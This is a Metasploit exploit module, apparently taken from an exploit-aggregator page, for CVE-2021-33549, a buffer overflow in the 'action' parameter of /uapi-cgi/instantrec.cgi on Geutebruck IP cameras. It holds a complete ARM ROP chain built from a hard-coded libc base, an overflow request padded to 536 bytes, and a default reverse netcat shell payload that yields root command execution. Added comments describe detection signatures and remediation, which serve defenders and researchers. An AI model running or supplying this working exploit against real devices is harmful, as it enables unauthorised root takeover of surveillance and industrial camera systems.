## https://sploitus.com/exploit?id=PACKETSTORM:164191
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
# Metasploit exploit module for CVE-2021-33549 (see References below): a buffer
# overflow in the 'action' parameter of /uapi-cgi/instantrec.cgi on the Geutebruck
# camera firmware versions listed in the Description. #exploit sends a single HTTP
# POST; #write_payload builds the ROP chain that is appended after the padding.
#
# Defender notes, limited to what this file shows:
#  - On the wire this is one POST whose URI carries a random hostname segment and a
#    '../' segment before the CGI path, with an 'action' value of 536 pattern bytes
#    followed by packed 32-bit words. That shape (oversized 'action' to the
#    instantrec CGI, '../' in the path) is the detection signature for this module.
#  - Every gadget address is derived from one hard-coded libc base, so the chain
#    relies on libc being mapped at a fixed address on the device (inferred from
#    the constants in #write_payload, not verified here).
#  - 'Privileged' => true and the Description indicate execution as root;
#    remediation is vendor firmware -- see the CISA advisory in References.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient # provides send_request_cgi / normalize_uri / target_uri used below
  include Msf::Exploit::CmdStager # mixed in, but no CmdStager method is called anywhere in this file

  # Registers the module metadata and the single TARGETURI option.
  #
  # @param info [Hash] caller-supplied module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Geutebruck instantrec Remote Command Execution',
        'Description' => %q{  
This module exploits a buffer overflow within the 'action'  
parameter of the /uapi-cgi/instantrec.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx,  
ETHC-22xx, and EWPC-22xx devices running firmware versions == 1.12.0.27 as well as firmware  
versions 1.12.13.2 and 1.12.14.5.  
Successful exploitation results in remote code execution as the root user.  
        },

        'Author' => [
          'Titouan Lazard - RandoriSec', # Discovery
          'Ibrahim Ayadhi - RandoriSec' # Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2021-33549'],
          ['URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
          ['URL', 'http://geutebruck.com'],
          ['URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
        ],
        'DisclosureDate' => '2021-07-08',
        'Privileged' => true,
        'Platform' => %w[unix linux],
        'Arch' => [ARCH_ARMLE], # little-endian ARM; matches the 'V' / 'I<' packing in write_payload
        'Targets' => [
          ['Automatic Target', {}]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
        },
        'Notes' => {
          'Stability' => ['CRASH_SAFE'],
          'Reliability' => ['REPEATABLE_SESSION'],
          'SideEffects' => ['ARTIFACTS_ON_DISK']
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to the instantrec page', '/uapi-cgi/instantrec.cgi'])
      ]
    )
  end

  # Builds the ROP chain that follows the padding in #exploit.
  #
  # Every gadget is libc base + a fixed offset, so the chain only fires when libc sits
  # at exactly libc_add on the device (inferred: no address randomisation on the
  # affected firmware). Shape of the chain as assembled below:
  #   1. pop r4 <- add_str - 0x14
  #   2. per 4-byte chunk of the command: pop r1 <- chunk, then the store gadget
  #      writes to [r4 + 0x14] and pops the next r4, so successive chunks land at
  #      add_str, add_str + 4, ...; the final iteration pops the filler 0x41414141.
  #   3. pop r0 <- add_str, then jump to system()
  # Net effect: payload.raw (the selected cmd payload's shell command) is copied
  # word by word into a libc data area and handed to system(); only that command
  # string reaches the device shell.
  #
  # NOTE(review): the inline comment on str_r1_off says "str r0", but the chain
  # loads each chunk into r1 and the variable is named str_r1 -- confirm which
  # register the gadget actually stores; gadget addresses cannot be verified here.
  #
  # @return [String] the chain packed as little-endian 32-bit words
  def write_payload
    # gadgets
    libc_add = 0x402da000 # hard-coded libc base; every address below is relative to it
    system_off = 0x00357fc
    libc_data_off = 0x12c960 # presumably a writable data region, used as the command buffer
    str_r1_off = 0x0006781c # str r0 into r4 + 0x14; pop r4 pc;
    pop_r0_off = 0x00101de4 # pop r0 pc
    pop_r1_off = 0x0010252c # pop r1 pc
    pop_r4_off = 0x00015164 # pop r4 pc
    system_ = libc_add + system_off
    str_r1 = libc_add + str_r1_off
    pop_r0 = libc_add + pop_r0_off
    pop_r1 = libc_add + pop_r1_off
    pop_r4 = libc_add + pop_r4_off
    add_str = libc_data_off + libc_add + 4 # destination of the first command word
    # Pad with 1..4 spaces so the length is a multiple of 4 (an already-aligned
    # command gets 4 extra spaces), then split into little-endian u32 words.
    chunks = (payload.raw + ' ' * (4 - payload.raw.length % 4)).unpack('I<*')
    rop = []
    rop += [pop_r4]
    rop += [add_str - 0x14] # r4 + 0x14 == add_str for the first store
    chunks.each_with_index do |chunk, index|
      rop += [pop_r1]
      rop += [chunk]
      rop += [str_r1]
      # The store gadget ends in "pop r4": feed it the next destination (minus the
      # 0x14 displacement), or a dummy value once the last word has been written.
      rop += if index != (chunks.length - 1)
               [add_str - 0x14 + ((index + 1) * 4)]
             else
               [0x41414141]
             end
    end
    rop += [pop_r0]
    rop += [add_str] # r0 = pointer to the copied command string
    rop += [system_]
    rop.pack('V*')
  end

  # Sends the single overflow request and hands off to the payload handler.
  #
  # The 'action' value is 536 bytes of cyclic pattern (a fixed offset, not measured
  # at run time) followed by the chain from #write_payload. The URI is built as
  # '/<random hostname>/../<TARGETURI>'; presumably the device normalises the '../'
  # back to the CGI path, which matters for any path-based detection rule. The HTTP
  # response is not inspected -- success is only observed through the handler.
  def exploit
    print_status("#{rhost}:#{rport} - Attempting to exploit...")
    pad_size = 536 # bytes of filler preceding the chain
    data = Rex::Text.pattern_create(pad_size) + write_payload
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri('/', Rex::Text.rand_hostname, '../', target_uri.path),
      'vars_post' => {
        'action' => data
      }
    )
    handler # framework handler for the selected payload; no return value is checked
  end
end